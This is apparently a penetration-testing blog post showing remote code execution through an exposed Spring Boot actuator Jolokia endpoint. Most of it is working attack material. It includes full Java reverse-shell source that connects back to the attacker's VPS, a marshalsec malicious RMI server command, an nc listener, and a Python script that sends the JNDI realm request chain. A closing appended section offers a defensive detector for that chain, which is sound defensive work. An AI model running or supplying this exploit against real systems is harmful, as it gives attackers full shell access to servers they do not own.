Spring Boot actuator misconfiguration vulnerability: RCE (jolokia)
A routine scan turned up a Spring Boot actuator.
You can see that there is a jolokia endpoint; looking at jolokia/list, the keyword type=MBeanFactory is present.
jolokia-realm-jndi-rce can be used; the steps are as follows.
First, start a web server with python3.
Compile the Java exploit code:

    /**
     *  javac -source 1.5 -target 1.5 JNDIObject.java
     *
     *  Build By LandGrey
     * */

    import java.io.File;
    import java.io.InputStream;
    import java.io.OutputStream;
    import java.net.Socket;

    public class JNDIObject {
        static {
            try{
                String ip = "your-vps-ip";
                String port = "443";
                String py_path = null;
                String[] cmd;
                if (!System.getProperty("os.name").toLowerCase().contains("windows")) {
                    String[] py_envs = new String[]{"/bin/python", "/bin/python3", "/usr/bin/python", "/usr/bin/python3", "/usr/local/bin/python", "/usr/local/bin/python3"};
                    for(int i = 0; i < py_envs.length; ++i) {
                        String py = py_envs[i];
                        if ((new File(py)).exists()) {
                            py_path = py;
                            break;
                        }
                    }
                    if (py_path != null) {
                        if ((new File("/bin/bash")).exists()) {
                            cmd = new String[]{py_path, "-c", "import pty;pty.spawn(\"/bin/bash\")"};
                        } else {
                            cmd = new String[]{py_path, "-c", "import pty;pty.spawn(\"/bin/sh\")"};
                        }
                    } else {
                        if ((new File("/bin/bash")).exists()) {
                            cmd = new String[]{"/bin/bash"};
                        } else {
                            cmd = new String[]{"/bin/sh"};
                        }
                    }
                } else {
                    cmd = new String[]{"cmd.exe"};
                }
                Process p = (new ProcessBuilder(cmd)).redirectErrorStream(true).start();
                Socket s = new Socket(ip, Integer.parseInt(port));
                InputStream pi = p.getInputStream();
                InputStream pe = p.getErrorStream();
                InputStream si = s.getInputStream();
                OutputStream po = p.getOutputStream();
                OutputStream so = s.getOutputStream();
                while(!s.isClosed()) {
                    while(pi.available() > 0) {
                        so.write(pi.read());
                    }
                    while(pe.available() > 0) {
                        so.write(pe.read());
                    }
                    while(si.available() > 0) {
                        po.write(si.read());
                    }
                    so.flush();
                    po.flush();
                    Thread.sleep(50L);
                    try {
                        p.exitValue();
                        break;
                    } catch (Exception e) {
                    }
                }
                p.destroy();
                s.close();
            }catch (Throwable e){
                e.printStackTrace();
            }
        }
    }

    javac -source 1.5 -target 1.5 JNDIObject.java

Set up the malicious RMI service:

    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://vps:8080/#JNDIObject 1389

Listen on the port:

    nc -lvp 443

Run the exp:

    #!/usr/bin/env python3
    # coding: utf-8
    # Referer: https://ricterz.me/posts/2019-03-06-yet-another-way-to-exploit-spring-boot-actuators-via-jolokia.txt

    import requests

    url = 'http://127.0.0.1:8080/jolokia'

    create_realm = {
        "mbean": "Tomcat:type=MBeanFactory",
        "type": "EXEC",
        "operation": "createJNDIRealm",
        "arguments": ["Tomcat:type=Engine"]
    }

    wirte_factory = {
        "mbean": "Tomcat:realmPath=/realm0,type=Realm",
        "type": "WRITE",
        "attribute": "contextFactory",
        "value": "com.sun.jndi.rmi.registry.RegistryContextFactory"
    }

    write_url = {
        "mbean": "Tomcat:realmPath=/realm0,type=Realm",
        "type": "WRITE",
        "attribute": "connectionURL",
        "value": "rmi://your-vps-ip:1389/JNDIObject"
    }

    stop = {
        "mbean": "Tomcat:realmPath=/realm0,type=Realm",
        "type": "EXEC",
        "operation": "stop",
        "arguments": []
    }

    start = {
        "mbean": "Tomcat:realmPath=/realm0,type=Realm",
        "type": "EXEC",
        "operation": "start",
        "arguments": []
    }

    flow = [create_realm, wirte_factory, write_url, stop, start]

    for i in flow:
        print('%s MBean %s: %s ...' % (i['type'].title(), i['mbean'], i.get('operation', i.get('attribute'))))
        r = requests.post(url, json=i)
        r.json()
        print(r.status_code)

    python3 springboot-realm-jndi-rce.py

Then wait two seconds and the shell comes back.
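A detection-side view of the request sequence the script above sends, as an added example that is not part of the original post: it scans captured POST bodies sent to /jolokia and flags createJNDIRealm on MBeanFactory, writes to a Realm's contextFactory or connectionURL, and a Realm stop/start. The function names and sample bodies are constructed for illustration; as an assumption, only the `type` key of the MBean name is matched and the JMX domain is ignored, and Jolokia bulk requests (a JSON array in one POST) are unpacked as well.

```python
import json
import re

TYPE_RE = re.compile(r"[:,]type=([^,]*)")  # 'type' key property of a JMX ObjectName
CHAIN = {"create_realm", "write_contextFactory", "write_connectionURL", "restart_realm"}

def classify(req):
    """Map one Jolokia request object to a stage of the realm/JNDI flow, or None."""
    kind = str(req.get("type", "")).lower()  # the script sends EXEC/WRITE in upper case
    m = TYPE_RE.search(str(req.get("mbean", "")))
    mtype = m.group(1) if m else ""
    if kind == "exec" and mtype == "MBeanFactory" and req.get("operation") == "createJNDIRealm":
        return "create_realm"
    if kind == "write" and mtype == "Realm" and req.get("attribute") in ("contextFactory", "connectionURL"):
        return "write_" + req["attribute"]
    if kind == "exec" and mtype == "Realm" and req.get("operation") in ("stop", "start"):
        return "restart_realm"

def scan(bodies):
    """Return (body_index, stage, mbean) for each matching request in raw POST bodies."""
    hits = []
    for i, raw in enumerate(bodies):
        try:
            doc = json.loads(raw)
        except ValueError:
            continue  # not JSON, so not a Jolokia POST request
        for req in doc if isinstance(doc, list) else [doc]:  # bulk requests are arrays
            stage = classify(req) if isinstance(req, dict) else None
            if stage:
                hits.append((i, stage, req["mbean"]))
    return hits

def full_chain(hits):
    """True when realm creation, both attribute writes and a restart were all seen."""
    return CHAIN <= {stage for _, stage, _ in hits}

# Constructed sample bodies (not real traffic): a benign read, then the flow as one bulk POST.
REALM = "Tomcat:realmPath=/realm0,type=Realm"
SAMPLE = [
    '{"type": "read", "mbean": "java.lang:type=Memory", "attribute": "HeapMemoryUsage"}',
    json.dumps([
        {"type": "EXEC", "mbean": "Tomcat:type=MBeanFactory", "operation": "createJNDIRealm"},
        {"type": "WRITE", "mbean": REALM, "attribute": "contextFactory",
         "value": "com.sun.jndi.rmi.registry.RegistryContextFactory"},
        {"type": "WRITE", "mbean": REALM, "attribute": "connectionURL",
         "value": "rmi://host.example:1389/obj"},
        {"type": "EXEC", "mbean": REALM, "operation": "start", "arguments": []},
    ]),
]
```

Calling `full_chain(scan(SAMPLE))` returns True for the constructed sample; any single stage on its own is still worth reviewing, since none of these operations is part of normal monitoring reads.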